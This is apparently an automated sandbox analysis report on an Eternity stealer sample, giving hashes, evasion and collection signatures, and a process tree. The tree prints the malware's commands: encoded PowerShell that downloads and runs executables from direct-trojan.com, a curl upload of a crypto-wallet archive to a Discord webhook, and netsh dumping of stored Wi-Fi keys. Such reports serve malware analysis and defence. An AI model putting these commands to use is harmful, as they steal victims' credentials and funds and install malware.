eternity | 839afac62aa1ba9eb4bf3b17d3877ba66e0857f45ccbbd12eefb940f6855ac09

Analysis

max time kernel
64s
max time network
140s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
12/01/2023, 14:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f4a68987e0ef243fa1e9bfe07c643052.exe
Size

203KB
MD5

f4a68987e0ef243fa1e9bfe07c643052
SHA1

872a9c456fcd0bedfe43c45be1e496b8947d3247
SHA256

839afac62aa1ba9eb4bf3b17d3877ba66e0857f45ccbbd12eefb940f6855ac09
SHA512

ea1b107e837bf1d22e5766ef8f0f6d9d5095787156912cf40c578bd9f600022b7660a14e0ba2d164a1b60fcc0a1f5dba7cde8ba109b7c878d7d0419520908ef3
SSDEEP

3072:G3UhZ86ZSJgWPcOWAvJ341j+EzKs4orHNV+Y:GEkAS6oAyEzK/y+

Score

10^/10

eternity collection evasion spyware stealer

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://direct-trojan.com/file/bff3da/FEFE.exe

Extracted

Language

ps1

Source

URLs

exe.dropper

https://direct-trojan.com/file/63b3bb/UserOOBEBroker.exe

Extracted

Language

ps1

Source

URLs

exe.dropper

https://direct-trojan.com/file/8a0b4b/oopsi.exe

Signatures

Eternity
Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.
eternity

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	DigitalSoft.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	DigitalSoft.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	DigitalSoft.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	DigitalSoft.exe
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	DigitalSoft.exe
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	DigitalSoft.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
27	ip-api.com

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
5060	DigitalSoft.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	LidInc.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	LidInc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	LidInc.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	DigitalSoft.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	DigitalSoft.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	LidInc.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
460	PING.EXE

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
4932	powershell.exe
4932	powershell.exe
2608	powershell.exe
2608	powershell.exe
1364	powershell.exe
1364	powershell.exe
716	powershell.exe
716	powershell.exe
748	powershell.exe
748	powershell.exe
5060	DigitalSoft.exe
4312	powershell.exe
4312	powershell.exe
4092	powershell.exe
4092	powershell.exe
5112	powershell.exe
5112	powershell.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

description	pid	Process
Token: SeDebugPrivilege	4932	powershell.exe
Token: SeDebugPrivilege	2608	powershell.exe
Token: SeDebugPrivilege	1364	powershell.exe
Token: SeDebugPrivilege	716	powershell.exe
Token: SeDebugPrivilege	748	powershell.exe
Token: SeDebugPrivilege	5060	DigitalSoft.exe
Token: SeDebugPrivilege	4312	powershell.exe
Token: SeDebugPrivilege	4092	powershell.exe
Token: SeDebugPrivilege	716	LidInc.exe
Token: SeDebugPrivilege	5112	powershell.exe
Token: SeDebugPrivilege	4500	LidInc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1976 wrote to memory of 4932	1976	f4a68987e0ef243fa1e9bfe07c643052.exe	80
PID 1976 wrote to memory of 4932	1976	f4a68987e0ef243fa1e9bfe07c643052.exe	80
PID 1976 wrote to memory of 4932	1976	f4a68987e0ef243fa1e9bfe07c643052.exe	80
PID 4932 wrote to memory of 2608	4932	powershell.exe	82
PID 4932 wrote to memory of 2608	4932	powershell.exe	82
PID 4932 wrote to memory of 2608	4932	powershell.exe	82
PID 2608 wrote to memory of 1364	2608	powershell.exe	83
PID 2608 wrote to memory of 1364	2608	powershell.exe	83
PID 2608 wrote to memory of 1364	2608	powershell.exe	83
PID 4932 wrote to memory of 716	4932	powershell.exe	84
PID 4932 wrote to memory of 716	4932	powershell.exe	84
PID 4932 wrote to memory of 716	4932	powershell.exe	84
PID 716 wrote to memory of 5060	716	powershell.exe	87
PID 716 wrote to memory of 5060	716	powershell.exe	87
PID 716 wrote to memory of 5060	716	powershell.exe	87
PID 4932 wrote to memory of 748	4932	powershell.exe	88
PID 4932 wrote to memory of 748	4932	powershell.exe	88
PID 4932 wrote to memory of 748	4932	powershell.exe	88
PID 5060 wrote to memory of 4148	5060	DigitalSoft.exe	89
PID 5060 wrote to memory of 4148	5060	DigitalSoft.exe	89
PID 5060 wrote to memory of 4148	5060	DigitalSoft.exe	89
PID 4148 wrote to memory of 596	4148	cmd.exe	91
PID 4148 wrote to memory of 596	4148	cmd.exe	91
PID 4148 wrote to memory of 596	4148	cmd.exe	91
PID 4148 wrote to memory of 836	4148	cmd.exe	92
PID 4148 wrote to memory of 836	4148	cmd.exe	92
PID 4148 wrote to memory of 836	4148	cmd.exe	92
PID 4148 wrote to memory of 392	4148	cmd.exe	93
PID 4148 wrote to memory of 392	4148	cmd.exe	93
PID 4148 wrote to memory of 392	4148	cmd.exe	93
PID 748 wrote to memory of 4224	748	powershell.exe	94
PID 748 wrote to memory of 4224	748	powershell.exe	94
PID 748 wrote to memory of 4224	748	powershell.exe	94
PID 5060 wrote to memory of 400	5060	DigitalSoft.exe	95
PID 5060 wrote to memory of 400	5060	DigitalSoft.exe	95
PID 5060 wrote to memory of 400	5060	DigitalSoft.exe	95
PID 400 wrote to memory of 3752	400	cmd.exe	97
PID 400 wrote to memory of 3752	400	cmd.exe	97
PID 400 wrote to memory of 3752	400	cmd.exe	97
PID 400 wrote to memory of 4900	400	cmd.exe	98
PID 400 wrote to memory of 4900	400	cmd.exe	98
PID 400 wrote to memory of 4900	400	cmd.exe	98
PID 400 wrote to memory of 5104	400	cmd.exe	99
PID 400 wrote to memory of 5104	400	cmd.exe	99
PID 400 wrote to memory of 5104	400	cmd.exe	99
PID 5060 wrote to memory of 1424	5060	DigitalSoft.exe	104
PID 5060 wrote to memory of 1424	5060	DigitalSoft.exe	104
PID 5060 wrote to memory of 1424	5060	DigitalSoft.exe	104
PID 1424 wrote to memory of 1828	1424	cmd.exe	106
PID 1424 wrote to memory of 1828	1424	cmd.exe	106
PID 1424 wrote to memory of 1828	1424	cmd.exe	106
PID 1424 wrote to memory of 460	1424	cmd.exe	107
PID 1424 wrote to memory of 460	1424	cmd.exe	107
PID 1424 wrote to memory of 460	1424	cmd.exe	107
PID 4932 wrote to memory of 4312	4932	powershell.exe	111
PID 4932 wrote to memory of 4312	4932	powershell.exe	111
PID 4932 wrote to memory of 4312	4932	powershell.exe	111
PID 4932 wrote to memory of 4092	4932	powershell.exe	112
PID 4932 wrote to memory of 4092	4932	powershell.exe	112
PID 4932 wrote to memory of 4092	4932	powershell.exe	112
PID 4092 wrote to memory of 716	4092	powershell.exe	113
PID 4092 wrote to memory of 716	4092	powershell.exe	113
PID 4092 wrote to memory of 716	4092	powershell.exe	113
PID 4932 wrote to memory of 5112	4932	powershell.exe	114

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	DigitalSoft.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	DigitalSoft.exe

C:\Users\Admin\AppData\Local\Temp\f4a68987e0ef243fa1e9bfe07c643052.exe
"C:\Users\Admin\AppData\Local\Temp\f4a68987e0ef243fa1e9bfe07c643052.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1976
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4932
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIgAgACAAOwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBTAHUAYgBtAGkAdABTAGEAbQBwAGwAZQBzAEMAbwBuAHMAZQBuAHQAIAAyAA==
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2608
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1364
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand UwB0AGEAcgB0AC0AQgBpAHQAcwBUAHIAYQBuAHMAZgBlAHIAIAAtAFMAbwB1AHIAYwBlACAAIgBoAHQAdABwAHMAOgAvAC8AZABpAHIAZQBjAHQALQB0AHIAbwBqAGEAbgAuAGMAbwBtAC8AZgBpAGwAZQAvAGIAZgBmADMAZABhAC8ARgBFAEYARQAuAGUAeABlACIAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACIAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAXABEAGkAZwBpAHQAYQBsAFMAbwBmAHQALgBlAHgAZQAiACAAOwAgAGMAZAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAOwAgAC4ALwBEAGkAZwBpAHQAYQBsAFMAbwBmAHQALgBlAHgAZQAgAA==
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:716
  - - C:\Users\Admin\AppData\Roaming\DigitalSoft.exe
      "C:\Users\Admin\AppData\Roaming\DigitalSoft.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Accesses Microsoft Outlook profiles
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      outlook_office_path
      outlook_win_path
      PID:5060
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4148
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        6⤵
        
        PID:596
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show profile
        6⤵
        
        PID:836
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr All
        6⤵
        
        PID:392
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show profile name="65001" key=clear | findstr Key
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:400
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        6⤵
        
        PID:3752
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show profile name="65001" key=clear
        6⤵
        
        PID:4900
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr Key
        6⤵
        
        PID:5104
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Roaming\DigitalSoft.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1424
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        6⤵
        
        PID:1828
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:460
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand QwBvAG0AcAByAGUAcwBzAC0AQQByAGMAaABpAHYAZQAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhAFwARQB4AG8AZAB1AHMAXABlAHgAbwBkAHUAcwAuAHcAYQBsAGwAZQB0ACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAQwA6AC8AVABtAHAALgB6AGkAcAAiACAAOwAgAGMAdQByAGwALgBlAHgAZQAgAC0ARgAgACIAcABhAHkAbABvAGEAZABfAGoAcwBvAG4APQB7AFwAYAAiAHUAcwBlAHIAbgBhAG0AZQBcAGAAIgA6ACAAXABgACIAQQBwAGUAXABgACIALAAgAFwAYAAiAGMAbwBuAHQAZQBuAHQAXABgACIAOgAgAFwAYAAiAEUAeABvAGQAdQBzAFwAYAAiAH0AIgAgAC0ARgAgACIAZgBpAGwAZQA9AEAAXABgACIAQwA6AFwAVABtAHAALgB6AGkAcABcAGAAIgAiAGgAdAB0AHAAcwA6AC8ALwBkAGkAcwBjAG8AcgBkAC4AYwBvAG0ALwBhAHAAaQAvAHcAZQBiAGgAbwBvAGsAcwAvADEAMAA1ADcANwA3ADIAOQA2ADIAMQAzADgAMwAxADIANwA3ADQALwBfADkAOABkADkALQBLAHoAUgBWAEkANwBkAG0AQQBnAEwAOABjAFoATwBMAGwALQBRAEkAbwBNADkAeQBKADYAWABwAHIAXwBIAE8ANwBnAEQAYwBKADYATwBlAF8AbQBEAG4AegBFADEAUgBKAEEATgA0AEgAcQA2AC0AcwB2AGoAUgBDAEoAIAA7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAIgBDADoALwBUAG0AcAAuAHoAaQBwACIA
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:748
  - - C:\Windows\SysWOW64\curl.exe
      "C:\Windows\system32\curl.exe" -F "payload_json={\"username\": \"Ape\", \"content\": \"Exodus\"}" -F file=@\"C:\Tmp.zip\" https://discord.com/api/webhooks/1057772962138312774/_98d9-KzRVI7dmAgL8cZOLl-QIoM9yJ6Xpr_HO7gDcJ6Oe_mDnzE1RJAN4Hq6-svjRCJ
      4⤵
      PID:4224
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand UwB0AGEAcgB0AC0AQgBpAHQAcwBUAHIAYQBuAHMAZgBlAHIAIAAtAFMAbwB1AHIAYwBlACAAIgBoAHQAdABwAHMAOgAvAC8AZABpAHIAZQBjAHQALQB0AHIAbwBqAGEAbgAuAGMAbwBtAC8AZgBpAGwAZQAvADYAMwBiADMAYgBiAC8AVQBzAGUAcgBPAE8AQgBFAEIAcgBvAGsAZQByAC4AZQB4AGUAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAIgAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQBcAGgAdAB0AHAAcwA6AC8ALwBkAGkAcgBlAGMAdAAtAHQAcgBvAGoAYQBuAC4AYwBvAG0ALwBmAGkAbABlAC8ANgAzAGIAMwBiAGIALwBVAHMAZQByAE8ATwBCAEUAQgByAG8AawBlAHIALgBlAHgAZQAiACAAOwAgAGMAZAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAOwAgAC4ALwBVAHMAZQByAE8ATwBCAEUAQgByAG8AawBlAHIALgBlAHgAZQA=
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4312
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand UwB0AGEAcgB0AC0AQgBpAHQAcwBUAHIAYQBuAHMAZgBlAHIAIAAtAFMAbwB1AHIAYwBlACAAIgBoAHQAdABwAHMAOgAvAC8AZABpAHIAZQBjAHQALQB0AHIAbwBqAGEAbgAuAGMAbwBtAC8AZgBpAGwAZQAvADgAYQAwAGIANABiAC8AbwBvAHAAcwBpAC4AZQB4AGUAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAIgAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQBcAEwAaQBkAEkAbgBjAC4AZQB4AGUAIgAgADsAIABjAGQAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADsAIAAuAC8ATABpAGQASQBuAGMALgBlAHgAZQAgAA==
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4092
  - - C:\Users\Admin\AppData\Roaming\LidInc.exe
      "C:\Users\Admin\AppData\Roaming\LidInc.exe"
      4⤵
      Checks processor information in registry
      Suspicious use of AdjustPrivilegeToken
      PID:716
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand UwB0AGEAcgB0AC0AQgBpAHQAcwBUAHIAYQBuAHMAZgBlAHIAIAAtAFMAbwB1AHIAYwBlACAAIgBoAHQAdABwAHMAOgAvAC8AZABpAHIAZQBjAHQALQB0AHIAbwBqAGEAbgAuAGMAbwBtAC8AZgBpAGwAZQAvADgAYQAwAGIANABiAC8AbwBvAHAAcwBpAC4AZQB4AGUAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAIgAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQBcAEwAaQBkAEkAbgBjAC4AZQB4AGUAIgAgADsAIABjAGQAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADsAIAAuAC8ATABpAGQASQBuAGMALgBlAHgAZQAgAA==
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5112
  - - C:\Users\Admin\AppData\Roaming\LidInc.exe
      "C:\Users\Admin\AppData\Roaming\LidInc.exe"
      4⤵
      Checks processor information in registry
      Suspicious use of AdjustPrivilegeToken
      PID:4500

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\LidInc.exe.log

Filesize
1KB

MD5
caeedd222a789cbcf6258c129dfb562f

SHA1
73e103da3af996fdf759565b5c3f412083abfd42

SHA256
0c88d4875beebfd0ecba84d0d3063869c03db8271210fcdb8c49a52d4fd7a99f

SHA512
70d975335923b9865e9d8a62ba9ee7e1a322b17e83069a9edde92cfd0d14943e75b4c8f67e6dc9e78d9e8879c01419b0a404c2d944bc9d0c57521994a82ca2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
3337d66209faa998d52d781d0ff2d804

SHA1
6594b85a70f998f79f43cdf1ca56137997534156

SHA256
9b946b062865f68b9f0f43a011d33d7ea0926a3c8f78fb20d9cab6144314e1bd

SHA512
8bbd14bd73111f7b55712f5d1e1b727e41db8e6e0c1243ee6809ff32b509e52dec7af34c064151fb5beccd59dda434a3f83abe987c561a25abfbb4cbcf9c7f1f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
db6b0af270e5818e0b2d25432af9a87d

SHA1
78370dbfe850d5e1469440103043fe2144ff61bc

SHA256
fcbf28024194daaca3ae043c47ff94be4a7a20b6759f6b0ae30e4695c1d8b75f

SHA512
4bd730dca25170277a5b57e89596a8669ee5f14111331c1b01884e7e9414f9a12cd872fb1289c9202139c59ab308216f38356c9940266b969ddce28fe2383aca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
87710fd788b37a47f73dfec0295fe6f4

SHA1
deab32d0ff917a1c18bac4cf089b8b90e33448db

SHA256
8537e283130c6754d7064761bf73f85fbc5391f2f5ed29213f53fb31ae5ef661

SHA512
0d4bc2afdb4696374ca37a631aca2b7d7afd7f0e3510d721f9d96db1ed7ca9366a1e643d10ac135344d0199d029933cb023b30bdcd71f57eaecd91ee06b51b00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
87710fd788b37a47f73dfec0295fe6f4

SHA1
deab32d0ff917a1c18bac4cf089b8b90e33448db

SHA256
8537e283130c6754d7064761bf73f85fbc5391f2f5ed29213f53fb31ae5ef661

SHA512
0d4bc2afdb4696374ca37a631aca2b7d7afd7f0e3510d721f9d96db1ed7ca9366a1e643d10ac135344d0199d029933cb023b30bdcd71f57eaecd91ee06b51b00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
492fb372ebacaf7a9f7e8ff5b0486205

SHA1
e86e218e652bad33132fc9c7a44b2b9d11d043b6

SHA256
ed4c536e78aa7d55340abf01ade5d3bd9d70a72e407acd0418a61aaba01f3de7

SHA512
b06d2e895e3a547cec73bb7190afaccdfba7d50d18a640fdab96040c80ec4b03e3b3b08588aaf62b5b6aabb1e2f52fe34deca6d6a0cbb3361ce2fb74f835f72a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
20KB

MD5
6138d63f7a1538e7962c68ac3f22b072

SHA1
0e858de11170021a81119fd6094cd74eb381c18a

SHA256
af1c1b97b6e1e028938ec1d83f68ace0997b870edd63e6b3388b3dc5f4122a24

SHA512
b680013d889de48aa0bc3c86ef6d46916a1bf0fd4cbad0f3411ab0be46146a8d854f45581a8ad890fcc6efd80b5112f11bb251233100d451abaefde8def07901

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
7aacdbdc7d98d8beb1a1f1a3f3bd2147

SHA1
9bad083c915e8f1cccbb6d7b82f811fdcf813ce8

SHA256
1e446d9f9fe07e304f3bb03595a1a6653d8765b9892748d8e25a9534f6084a08

SHA512
e7cbe7e9dba2a1b821370600fc82de4ed5e31cc310a3439e18163f3c6d2995e0b910787f48377b16567e6a1f3c2fff30ef2c5dce6ee602b64e230bfc62041ed6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
01da4b7243fefa4d55ad67b994f25fc8

SHA1
9a92a0b8b36d73223c8522fc7b941b40069c3fdb

SHA256
a59236eb2e7868854860b58c444cb59970db857393b2cc839fade503d548e525

SHA512
1be54f864661d14c7dba6a31505ecf0d29e324c2205cc15d58f348e955d4ba3cafe1305551ce48c50b7c25c698a807a7461890c2bb575f46cbe476a1f031ea1e

Download Submit
memory/716-203-0x00000000068A0000-0x00000000068B2000-memory.dmp

Filesize
72KB

Download
memory/716-163-0x00000000073D0000-0x00000000073E4000-memory.dmp

Filesize
80KB

Download
memory/716-162-0x0000000007240000-0x0000000007262000-memory.dmp

Filesize
136KB

Download
memory/716-161-0x0000000070650000-0x000000007069C000-memory.dmp

Filesize
304KB

Download
memory/716-206-0x0000000006B60000-0x0000000006B72000-memory.dmp

Filesize
72KB

Download
memory/716-200-0x0000000000AA0000-0x0000000000AC0000-memory.dmp

Filesize
128KB

Download
memory/716-204-0x00000000075D0000-0x000000000760C000-memory.dmp

Filesize
240KB

Download
memory/748-174-0x0000000070650000-0x000000007069C000-memory.dmp

Filesize
304KB

Download
memory/1364-156-0x0000000070650000-0x000000007069C000-memory.dmp

Filesize
304KB

Download
memory/1976-132-0x0000000000F20000-0x0000000000F5A000-memory.dmp

Filesize
232KB

Download
memory/1976-143-0x0000000005910000-0x00000000059A2000-memory.dmp

Filesize
584KB

Download
memory/1976-133-0x0000000005DE0000-0x0000000006384000-memory.dmp

Filesize
5.6MB

Download
memory/2608-150-0x00000000075C0000-0x00000000075CA000-memory.dmp

Filesize
40KB

Download
memory/2608-149-0x0000000006780000-0x000000000679E000-memory.dmp

Filesize
120KB

Download
memory/2608-148-0x0000000070650000-0x000000007069C000-memory.dmp

Filesize
304KB

Download
memory/2608-147-0x0000000006810000-0x0000000006842000-memory.dmp

Filesize
200KB

Download
memory/2608-154-0x00000000077C0000-0x00000000077C8000-memory.dmp

Filesize
32KB

Download
memory/2608-153-0x00000000077D0000-0x00000000077EA000-memory.dmp

Filesize
104KB

Download
memory/2608-152-0x0000000007780000-0x000000000778E000-memory.dmp

Filesize
56KB

Download
memory/2608-151-0x00000000077F0000-0x0000000007886000-memory.dmp

Filesize
600KB

Download
memory/4312-195-0x0000000070650000-0x000000007069C000-memory.dmp

Filesize
304KB

Download
memory/4312-196-0x0000000070850000-0x0000000070BA4000-memory.dmp

Filesize
3.3MB

Download
memory/4932-145-0x0000000007850000-0x000000000786A000-memory.dmp

Filesize
104KB

Download
memory/4932-141-0x0000000006A00000-0x0000000006A44000-memory.dmp

Filesize
272KB

Download
memory/4932-135-0x0000000002B50000-0x0000000002B86000-memory.dmp

Filesize
216KB

Download
memory/4932-136-0x0000000005950000-0x0000000005F78000-memory.dmp

Filesize
6.2MB

Download
memory/4932-137-0x00000000054D0000-0x00000000054F2000-memory.dmp

Filesize
136KB

Download
memory/4932-138-0x0000000005570000-0x00000000055D6000-memory.dmp

Filesize
408KB

Download
memory/4932-139-0x0000000005810000-0x0000000005876000-memory.dmp

Filesize
408KB

Download
memory/4932-144-0x0000000007ED0000-0x000000000854A000-memory.dmp

Filesize
6.5MB

Download
memory/4932-142-0x00000000077D0000-0x0000000007846000-memory.dmp

Filesize
472KB

Download
memory/4932-140-0x00000000064A0000-0x00000000064BE000-memory.dmp

Filesize
120KB

Download
memory/5060-171-0x0000000000630000-0x0000000000EB2000-memory.dmp

Filesize
8.5MB

Download
memory/5060-170-0x0000000000630000-0x0000000000EB2000-memory.dmp

Filesize
8.5MB

Download
memory/5060-172-0x0000000077370000-0x0000000077513000-memory.dmp

Filesize
1.6MB

Download
memory/5060-176-0x0000000006BE0000-0x0000000006C30000-memory.dmp

Filesize
320KB

Download
memory/5060-191-0x0000000077370000-0x0000000077513000-memory.dmp

Filesize
1.6MB

Download
memory/5060-190-0x0000000000630000-0x0000000000EB2000-memory.dmp

Filesize
8.5MB

Download
